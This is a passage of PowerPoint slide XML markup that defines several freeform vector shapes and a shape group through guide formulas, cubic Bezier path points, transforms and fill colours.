                        <a:pt x="854" y="168"/>
                        <a:pt x="844" y="1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28" name="Freeform 520">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{763B1CED-F05A-4B68-92DD-5CF8F310E86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508" y="2743"/>
                  <a:ext cx="1965" cy="529"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 832"/>
                    <a:gd name="T1" fmla="*/ 0 h 224"/>
                    <a:gd name="T2" fmla="*/ 0 w 832"/>
                    <a:gd name="T3" fmla="*/ 56 h 224"/>
                    <a:gd name="T4" fmla="*/ 622 w 832"/>
                    <a:gd name="T5" fmla="*/ 224 h 224"/>
                    <a:gd name="T6" fmla="*/ 832 w 832"/>
                    <a:gd name="T7" fmla="*/ 168 h 224"/>
                    <a:gd name="T8" fmla="*/ 209 w 832"/>
                    <a:gd name="T9" fmla="*/ 0 h 2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32" h="224">
                      <a:moveTo>
                        <a:pt x="209" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="0"/>
                        <a:pt x="0" y="56"/>
                        <a:pt x="0" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="56"/>
                        <a:pt x="586" y="224"/>
                        <a:pt x="622" y="224"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="659" y="224"/>
                        <a:pt x="832" y="168"/>
                        <a:pt x="832" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="832" y="168"/>
                        <a:pt x="234" y="0"/>
                        <a:pt x="2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29" name="Freeform 521">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{817B245B-32FE-4C94-8F5E-FB985E487E7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697" y="2735"/>
                  <a:ext cx="534" cy="244"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 226"/>
                    <a:gd name="T1" fmla="*/ 78 h 103"/>
                    <a:gd name="T2" fmla="*/ 19 w 226"/>
                    <a:gd name="T3" fmla="*/ 44 h 103"/>
                    <a:gd name="T4" fmla="*/ 116 w 226"/>
                    <a:gd name="T5" fmla="*/ 10 h 103"/>
                    <a:gd name="T6" fmla="*/ 159 w 226"/>
                    <a:gd name="T7" fmla="*/ 6 h 103"/>
                    <a:gd name="T8" fmla="*/ 218 w 226"/>
                    <a:gd name="T9" fmla="*/ 20 h 103"/>
                    <a:gd name="T10" fmla="*/ 212 w 226"/>
                    <a:gd name="T11" fmla="*/ 40 h 103"/>
                    <a:gd name="T12" fmla="*/ 63 w 226"/>
                    <a:gd name="T13" fmla="*/ 96 h 103"/>
                    <a:gd name="T14" fmla="*/ 7 w 226"/>
                    <a:gd name="T15" fmla="*/ 78 h 1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26" h="103">
                      <a:moveTo>
                        <a:pt x="7" y="78"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="0" y="54"/>
                        <a:pt x="19" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="35"/>
                        <a:pt x="99" y="19"/>
                        <a:pt x="116" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="134" y="1"/>
                        <a:pt x="152" y="0"/>
                        <a:pt x="159" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="166" y="12"/>
                        <a:pt x="218" y="11"/>
                        <a:pt x="218" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="218" y="28"/>
                        <a:pt x="226" y="35"/>
                        <a:pt x="212" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="44"/>
                        <a:pt x="87" y="103"/>
                        <a:pt x="63" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="89"/>
                        <a:pt x="7" y="89"/>
                        <a:pt x="7" y="7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30" name="Freeform 522">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311862D4-17A2-4C23-AAF6-30236770E8B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857" y="2688"/>
                  <a:ext cx="230" cy="232"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 97"/>
                    <a:gd name="T1" fmla="*/ 23 h 98"/>
                    <a:gd name="T2" fmla="*/ 22 w 97"/>
                    <a:gd name="T3" fmla="*/ 83 h 98"/>
                    <a:gd name="T4" fmla="*/ 82 w 97"/>
                    <a:gd name="T5" fmla="*/ 75 h 98"/>
                    <a:gd name="T6" fmla="*/ 74 w 97"/>
                    <a:gd name="T7" fmla="*/ 15 h 98"/>
                    <a:gd name="T8" fmla="*/ 14 w 97"/>
                    <a:gd name="T9" fmla="*/ 23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7" h="98">
                      <a:moveTo>
                        <a:pt x="14" y="23"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="42"/>
                        <a:pt x="3" y="69"/>
                        <a:pt x="22" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="98"/>
                        <a:pt x="68" y="94"/>
                        <a:pt x="82" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="56"/>
                        <a:pt x="93" y="29"/>
                        <a:pt x="74" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="0"/>
                        <a:pt x="28" y="4"/>
                        <a:pt x="14" y="23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31" name="Freeform 523">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB604C9-037E-49F5-A341-5D73094866E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857" y="2688"/>
                  <a:ext cx="230" cy="232"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 97"/>
                    <a:gd name="T1" fmla="*/ 23 h 98"/>
                    <a:gd name="T2" fmla="*/ 22 w 97"/>
                    <a:gd name="T3" fmla="*/ 83 h 98"/>
                    <a:gd name="T4" fmla="*/ 82 w 97"/>
                    <a:gd name="T5" fmla="*/ 75 h 98"/>
                    <a:gd name="T6" fmla="*/ 74 w 97"/>
                    <a:gd name="T7" fmla="*/ 15 h 98"/>
                    <a:gd name="T8" fmla="*/ 14 w 97"/>
                    <a:gd name="T9" fmla="*/ 23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7" h="98">
                      <a:moveTo>
                        <a:pt x="14" y="23"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="42"/>
                        <a:pt x="3" y="69"/>
                        <a:pt x="22" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="98"/>
                        <a:pt x="68" y="94"/>
                        <a:pt x="82" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="56"/>
                        <a:pt x="93" y="29"/>
                        <a:pt x="74" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="0"/>
                        <a:pt x="28" y="4"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo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32" name="Freeform 524">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CE3F464-DD3F-4511-9EDB-4398BDB4479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995" y="2780"/>
                  <a:ext cx="125" cy="149"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 53"/>
                    <a:gd name="T1" fmla="*/ 47 h 63"/>
                    <a:gd name="T2" fmla="*/ 5 w 53"/>
                    <a:gd name="T3" fmla="*/ 53 h 63"/>
                    <a:gd name="T4" fmla="*/ 0 w 53"/>
                    <a:gd name="T5" fmla="*/ 41 h 63"/>
                    <a:gd name="T6" fmla="*/ 29 w 53"/>
                    <a:gd name="T7" fmla="*/ 11 h 63"/>
                    <a:gd name="T8" fmla="*/ 43 w 53"/>
                    <a:gd name="T9" fmla="*/ 17 h 63"/>
                    <a:gd name="T10" fmla="*/ 32 w 53"/>
                    <a:gd name="T11" fmla="*/ 47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3" h="63">
                      <a:moveTo>
                        <a:pt x="32" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="59"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="5" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="46"/>
                        <a:pt x="1" y="45"/>
                        <a:pt x="0" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="37"/>
                        <a:pt x="16" y="0"/>
                        <a:pt x="29" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="15"/>
                        <a:pt x="33" y="23"/>
                        <a:pt x="43" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="12"/>
                        <a:pt x="45" y="35"/>
                        <a:pt x="32" y="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33" name="Freeform 525">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D287491-CD7B-414B-9E88-E33B00B6003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829" y="2752"/>
                  <a:ext cx="1519" cy="487"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 19 w 643"/>
                    <a:gd name="T1" fmla="*/ 92 h 206"/>
                    <a:gd name="T2" fmla="*/ 54 w 643"/>
                    <a:gd name="T3" fmla="*/ 34 h 206"/>
                    <a:gd name="T4" fmla="*/ 143 w 643"/>
                    <a:gd name="T5" fmla="*/ 5 h 206"/>
                    <a:gd name="T6" fmla="*/ 182 w 643"/>
                    <a:gd name="T7" fmla="*/ 9 h 206"/>
                    <a:gd name="T8" fmla="*/ 624 w 643"/>
                    <a:gd name="T9" fmla="*/ 121 h 206"/>
                    <a:gd name="T10" fmla="*/ 625 w 643"/>
                    <a:gd name="T11" fmla="*/ 154 h 206"/>
                    <a:gd name="T12" fmla="*/ 434 w 643"/>
                    <a:gd name="T13" fmla="*/ 205 h 206"/>
                    <a:gd name="T14" fmla="*/ 19 w 643"/>
                    <a:gd name="T15" fmla="*/ 92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43" h="206">
                      <a:moveTo>
                        <a:pt x="19" y="92"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="64"/>
                        <a:pt x="0" y="43"/>
                        <a:pt x="54" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="25"/>
                        <a:pt x="128" y="9"/>
                        <a:pt x="143" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="157" y="0"/>
                        <a:pt x="163" y="4"/>
                        <a:pt x="182" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="200" y="14"/>
                        <a:pt x="605" y="111"/>
                        <a:pt x="624" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="643" y="130"/>
                        <a:pt x="637" y="150"/>
                        <a:pt x="625" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="612" y="157"/>
                        <a:pt x="445" y="203"/>
                        <a:pt x="434" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="423" y="206"/>
                        <a:pt x="20" y="106"/>
                        <a:pt x="19" y="92"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF660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34" name="Freeform 526">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E200184A-79EA-4689-9E71-51A46BEAFF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gray">
                <a:xfrm>
                  <a:off x="16477" y="2825"/>
                  <a:ext cx="1543" cy="546"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 619 w 653"/>
                    <a:gd name="T1" fmla="*/ 154 h 231"/>
                    <a:gd name="T2" fmla="*/ 53 w 653"/>
                    <a:gd name="T3" fmla="*/ 2 h 231"/>
                    <a:gd name="T4" fmla="*/ 43 w 653"/>
                    <a:gd name="T5" fmla="*/ 0 h 231"/>
                    <a:gd name="T6" fmla="*/ 5 w 653"/>
                    <a:gd name="T7" fmla="*/ 29 h 231"/>
                    <a:gd name="T8" fmla="*/ 33 w 653"/>
                    <a:gd name="T9" fmla="*/ 77 h 231"/>
                    <a:gd name="T10" fmla="*/ 599 w 653"/>
                    <a:gd name="T11" fmla="*/ 230 h 231"/>
                    <a:gd name="T12" fmla="*/ 609 w 653"/>
                    <a:gd name="T13" fmla="*/ 231 h 231"/>
                    <a:gd name="T14" fmla="*/ 647 w 653"/>
                    <a:gd name="T15" fmla="*/ 202 h 231"/>
                    <a:gd name="T16" fmla="*/ 619 w 653"/>
                    <a:gd name="T17" fmla="*/ 154 h 231"/>
                    <a:gd name="T18" fmla="*/ 181 w 653"/>
                    <a:gd name="T19" fmla="*/ 82 h 231"/>
                    <a:gd name="T20" fmla="*/ 456 w 653"/>
                    <a:gd name="T21" fmla="*/ 155 h 231"/>
                    <a:gd name="T22" fmla="*/ 456 w 653"/>
                    <a:gd name="T23" fmla="*/ 182 h 231"/>
                    <a:gd name="T24" fmla="*/ 181 w 653"/>
                    <a:gd name="T25" fmla="*/ 108 h 231"/>
                    <a:gd name="T26" fmla="*/ 181 w 653"/>
                    <a:gd name="T27" fmla="*/ 82 h 231"/>
                    <a:gd name="T28" fmla="*/ 456 w 653"/>
                    <a:gd name="T29" fmla="*/ 146 h 231"/>
                    <a:gd name="T30" fmla="*/ 181 w 653"/>
                    <a:gd name="T31" fmla="*/ 73 h 231"/>
                    <a:gd name="T32" fmla="*/ 181 w 653"/>
                    <a:gd name="T33" fmla="*/ 45 h 231"/>
                    <a:gd name="T34" fmla="*/ 456 w 653"/>
                    <a:gd name="T35" fmla="*/ 119 h 231"/>
                    <a:gd name="T36" fmla="*/ 456 w 653"/>
                    <a:gd name="T37" fmla="*/ 146 h 231"/>
                    <a:gd name="T38" fmla="*/ 14 w 653"/>
                    <a:gd name="T39" fmla="*/ 31 h 231"/>
                    <a:gd name="T40" fmla="*/ 43 w 653"/>
                    <a:gd name="T41" fmla="*/ 9 h 231"/>
                    <a:gd name="T42" fmla="*/ 51 w 653"/>
                    <a:gd name="T43" fmla="*/ 10 h 231"/>
                    <a:gd name="T44" fmla="*/ 172 w 653"/>
                    <a:gd name="T45" fmla="*/ 43 h 231"/>
                    <a:gd name="T46" fmla="*/ 172 w 653"/>
                    <a:gd name="T47" fmla="*/ 106 h 231"/>
                    <a:gd name="T48" fmla="*/ 35 w 653"/>
                    <a:gd name="T49" fmla="*/ 69 h 231"/>
                    <a:gd name="T50" fmla="*/ 14 w 653"/>
                    <a:gd name="T51" fmla="*/ 31 h 231"/>
                    <a:gd name="T52" fmla="*/ 639 w 653"/>
                    <a:gd name="T53" fmla="*/ 200 h 231"/>
                    <a:gd name="T54" fmla="*/ 609 w 653"/>
                    <a:gd name="T55" fmla="*/ 222 h 231"/>
                    <a:gd name="T56" fmla="*/ 601 w 653"/>
                    <a:gd name="T57" fmla="*/ 221 h 231"/>
                    <a:gd name="T58" fmla="*/ 465 w 653"/>
                    <a:gd name="T59" fmla="*/ 184 h 231"/>
                    <a:gd name="T60" fmla="*/ 465 w 653"/>
                    <a:gd name="T61" fmla="*/ 121 h 231"/>
                    <a:gd name="T62" fmla="*/ 617 w 653"/>
                    <a:gd name="T63" fmla="*/ 162 h 231"/>
                    <a:gd name="T64" fmla="*/ 639 w 653"/>
                    <a:gd name="T65" fmla="*/ 200 h 2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653" h="231">
                      <a:moveTo>
                        <a:pt x="619" y="154"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="2"/>
                        <a:pt x="53" y="2"/>
                        <a:pt x="53" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="1"/>
                        <a:pt x="47" y="0"/>
                        <a:pt x="43" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="0"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="5" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="50"/>
                        <a:pt x="12" y="72"/>
                        <a:pt x="33" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="599" y="230"/>
                        <a:pt x="599" y="230"/>
                        <a:pt x="599" y="230"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="602" y="230"/>
                        <a:pt x="606" y="231"/>
                        <a:pt x="609" y="231"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="627" y="231"/>
                        <a:pt x="643" y="219"/>
                        <a:pt x="647" y="202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="653" y="181"/>
                        <a:pt x="640" y="159"/>
                        <a:pt x="619" y="154"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="181" y="82"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="155"/>
                        <a:pt x="456" y="155"/>
                        <a:pt x="456" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="182"/>
                        <a:pt x="456" y="182"/>
                        <a:pt x="456" y="182"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="108"/>
                        <a:pt x="181" y="108"/>
                        <a:pt x="181" y="108"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="181" y="82"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="456" y="146"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="73"/>
                        <a:pt x="181" y="73"/>
                        <a:pt x="181" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="45"/>
                        <a:pt x="181" y="45"/>
                        <a:pt x="181" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="119"/>
                        <a:pt x="456" y="119"/>
                        <a:pt x="456" y="119"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="456" y="146"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="14" y="31"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="18"/>
                        <a:pt x="30" y="9"/>
                        <a:pt x="43" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="9"/>
                        <a:pt x="49" y="9"/>
                        <a:pt x="51" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="43"/>
                        <a:pt x="172" y="43"/>
                        <a:pt x="172" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="106"/>
                        <a:pt x="172" y="106"/>
                        <a:pt x="172" y="106"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="69"/>
                        <a:pt x="35" y="69"/>
                        <a:pt x="35" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="64"/>
                        <a:pt x="10" y="48"/>
                        <a:pt x="14" y="31"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="639" y="200"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="635" y="213"/>
                        <a:pt x="623" y="222"/>
                        <a:pt x="609" y="222"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="607" y="222"/>
                        <a:pt x="604" y="222"/>
                        <a:pt x="601" y="221"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="465" y="184"/>
                        <a:pt x="465" y="184"/>
                        <a:pt x="465" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="465" y="121"/>
                        <a:pt x="465" y="121"/>
                        <a:pt x="465" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="617" y="162"/>
                        <a:pt x="617" y="162"/>
                        <a:pt x="617" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="633" y="167"/>
                        <a:pt x="643" y="183"/>
                        <a:pt x="639" y="20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02" name="Group 935">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C4A813-8F6B-4E6D-B31D-71CA2ACE64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76" y="2209"/>
                <a:ext cx="132" cy="314"/>
                <a:chOff x="3976" y="2209"/>
                <a:chExt cx="132" cy="314"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1803" name="Freeform 528">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C084C9-7FAD-4781-9254-C2454581B80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 flipH="1">
                  <a:off x="4015" y="2361"/>
                  <a:ext cx="60" cy="162"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 11 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 206 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 205 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 89 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 90 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 90 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5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2"/>
                        <a:pt x="2" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="229"/>
                        <a:pt x="44" y="225"/>
                        <a:pt x="44" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="207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9" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="201"/>
                        <a:pt x="89" y="171"/>
                        <a:pt x="89" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="5"/>
                        <a:pt x="90" y="5"/>
                        <a:pt x="90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</a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="39A962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04" name="Freeform 529">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30AD20E-9A11-403A-948E-74F10B1BCE5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 flipH="1">
                  <a:off x="4015" y="2361"/>
                  <a:ext cx="60" cy="162"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 11 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 206 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 205 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 89 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 90 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 90 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5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2"/>
                        <a:pt x="2" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="229"/>
                        <a:pt x="44" y="225"/>
                        <a:pt x="44" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="207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9" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="201"/>
                        <a:pt x="89" y="171"/>
                        <a:pt x="89" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="5"/>
                        <a:pt x="90" y="5"/>
                        <a:pt x="90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05" name="Freeform 530">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94F5BC8-0DDF-4F74-9F82-4FA8E874F84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 flipH="1">
                  <a:off x="3976" y="2252"/>
                  <a:ext cx="132" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 169 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 100 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 60 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 30 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
